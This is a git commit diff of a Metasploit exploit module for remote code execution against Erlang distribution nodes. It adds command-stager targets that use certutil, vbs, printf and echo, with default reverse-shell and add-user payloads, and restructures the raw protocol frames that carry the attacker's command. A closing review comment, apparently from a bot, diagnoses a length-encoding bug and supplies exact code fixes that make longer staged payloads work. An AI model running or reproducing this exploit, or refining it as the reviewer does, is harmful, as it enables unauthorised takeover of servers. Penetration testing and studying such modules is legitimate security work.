Add CmdStager to erlang_cookie_rce
parent
0471d69c16
commit
4bc871c499
@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStager
def initialize(info = {})
super(
@ -28,8 +29,6 @@ class MetasploitModule < Msf::Exploit::Remote
['URL', 'https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/']
],
'License' => MSF_LICENSE,
'Platform' => ['unix', 'win'],
'Arch' => ARCH_CMD,
'Privileged' => 'false',
'Targets' =>
[
@ -38,10 +37,23 @@ class MetasploitModule < Msf::Exploit::Remote
'Arch' => ARCH_CMD,
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse'},
],
[ 'Linux (CmdStager)',
'Type' => :cmdstager,
'Platform' => 'linux',
'Arch' => [ARCH_X64, ARCH_X86],
'CmdStagerFlavor' => ['printf', 'echo', 'bourne']
],
[ 'Windows',
'Platform' => 'win',
'Arch' => ARCH_CMD,
'DefaultOptions' => {'PAYLOAD' => 'cmd/windows/adduser'},
],
[ 'Windows (CmdStager)',
'Type' => :cmdstager,
'Platform' => 'win',
'Arch' => [ARCH_X64, ARCH_X86],
'CmdStagerFlavor' => ['certutil', 'vbs'],
'DefaultOptions' => {'PAYLOAD' => 'windows/shell/reverse_tcp'}
]
],
'DefaultTarget' => 0,
@ -67,26 +79,10 @@ class MetasploitModule < Msf::Exploit::Remote
return [hash.hexdigest].pack('H*')
end
def exploit
connect
our_node = "#{rand_text_alphanumeric(6..12)}@#{rand_text_alphanumeric(6..12)}"
# SEND_NAME: send initial identification of who "we" are
send_name = "\x00" # Length: 0x0000
send_name << [(our_node.length+7).to_s(16)].pack('H*') #
send_name << "\x6e" # Tag: n
send_name << "\x00\x05" # Version: R6 (5)
send_name << "\x00\x03\x49\x9c" # Flags (0x0003499c)
send_name << "#{our_node}" # <generated>@<generated>
# SEND_CHALLENGE_REPLY: return generated digest and its own challenge
send_challenge_reply = "\x00\x15" # Length: 21
send_challenge_reply << "\x72" # Tag: r
def execute_command(cmd, opts={})
# SEND: send the message to the node
send = "\x00\x00\x00" # Length:0x00000000
send << [(0x50 + payload.raw.length + our_node.length*2).to_s(16)].pack('H*') #
send << [(0x50 + cmd.length + @our_node.length*2).to_s(16)].pack('H*') #
send << "\x70" #
send << "\x83" # VERSION_MAGIC
send << "\x68" # SMALL_TUPLE_EXT (104)
@ -95,8 +91,8 @@ class MetasploitModule < Msf::Exploit::Remote
send << "\x06" # Int: 6
send << "\x67" # PID_EXT (103)
send << "\x64\x00" # Node:
send << [(our_node.length).to_s(16)].pack('H*') # Length: strlen(Node)
send << "#{our_node}" # Node
send << [(@our_node.length).to_s(16)].pack('H*') # Length: strlen(Node)
send << "#{@our_node}" # Node
send << "\x00\x00\x00\x03" # ID
send << "\x00\x00\x00\x00" # Serial
send << "\x00" # Creation
@ -106,8 +102,8 @@ class MetasploitModule < Msf::Exploit::Remote
send << "\x00\x03" # Length: 3
send << "rex" # AtomText: rex
send << "\x83\x68\x02\x67\x64\x00" #
send << [(our_node.length).to_s(16)].pack('H*') # Length: strlen(Node)
send << "#{our_node}" # Node
send << [(@our_node.length).to_s(16)].pack('H*') # Length: strlen(Node)
send << "#{@our_node}" # Node
send << "\x00\x00\x00\x03" # ID
send << "\x00\x00\x00\x00" # Serial
send << "\x00" # Creation
@ -126,12 +122,31 @@ class MetasploitModule < Msf::Exploit::Remote
send << "\x00\x00\x00\x01" # Length: 1
send << "\x6b" # Elements: k
send << "\x00" # Tail
send << [(payload.raw.length).to_s(16)].pack('H*') # strlen(Command)
send << payload.raw # Command
send << [(cmd.length).to_s(16)].pack('H*') # strlen(Command)
send << cmd
send << "\x6a" # NIL_EXT
send << "\x64" # InternalSegmentIndex
send << "\x00\x04" # Length: 4
send << "user" # AtomText: user
sock.put(send)
end
def exploit
connect
@our_node = "#{rand_text_alphanumeric(6..12)}@#{rand_text_alphanumeric(6..12)}"
# SEND_NAME: send initial identification of who "we" are
send_name = "\x00" # Length: 0x0000
send_name << [(@our_node.length+7).to_s(16)].pack('H*') #
send_name << "\x6e" # Tag: n
send_name << "\x00\x05" # Version: R6 (5)
send_name << "\x00\x03\x49\x9c" # Flags (0x0003499c)
send_name << "#{@our_node}" # <generated>@<generated>
# SEND_CHALLENGE_REPLY: return generated digest and its own challenge
send_challenge_reply = "\x00\x15" # Length: 21
send_challenge_reply << "\x72" # Tag: r
sock.put(send_name)
@ -151,6 +166,13 @@ class MetasploitModule < Msf::Exploit::Remote
end
print_good("Authentication successful, sending payload")
sock.put(send)
print_status('Exploiting...')
if target['Type'] == :cmdstager
execute_cmdstager(:linemax => 100)
else
execute_command(payload.raw)
end
disconnect
end
end
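Review bot: The length fields that `execute_command` now emits for every CmdStager line are still built with `to_s(16)` + `pack('H*')`, which only produces a correct single byte while the value is between 0x10 and 0xff — at 0x100 the three-digit hex string packs into a misaligned byte pair and the frame is silently corrupted, so the `:linemax => 100` passed to `execute_cmdstager` is the only thing keeping `0x50 + cmd.length + @our_node.length*2` under 256 and a flavor that emits a longer line would break without any error. Encode the integers directly instead: `send = [0x50 + cmd.length + @our_node.length * 2].pack('N')` for the 4-byte frame length (dropping the literal `"\x00\x00\x00"` prefix), `send << [cmd.length].pack('n')` for the 2-byte length after the `"\x6b"` element (replacing the `"\x00"` "Tail" byte plus hex byte), and likewise `send_name = [@our_node.length + 7].pack('n')` in `exploit`. A `fail_with(Failure::BadConfig, ...)` when `cmd.length` exceeds what the 2-byte field can carry would make the remaining limit explicit rather than a silent protocol error. `exploit` begins in an earlier hunk and `execute_command` is split across three hunks, so most of the affected lines sit outside this one.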